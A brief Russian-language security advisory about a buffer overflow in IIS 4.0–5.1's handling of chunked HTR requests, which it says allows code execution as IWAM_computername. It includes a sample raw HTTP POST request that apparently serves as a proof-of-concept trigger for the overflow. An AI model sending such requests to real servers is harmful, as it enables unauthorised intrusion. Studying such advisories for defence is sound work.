Уязвимость обнаружена в transfer chunking в
комбинации с обработкой сеансов HTR запросов. Посылая специально обработанный htr сеанс, нападающий может переполнить буфер и
записать произвольные данные в память. Записанный код будет выполнен с привилегиями IWAM_computername. 

Пример:

POST /EEYE.htr HTTP/1.1
Host: 0day.big5.com
Transfer-Encoding: chunked
20
XXXXXXXXXXXXXXXXXXXXXXXXEEYE2002
0
[enter]
[enter]

Уязвимость обнаружена в IIS 4.0-5.1.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии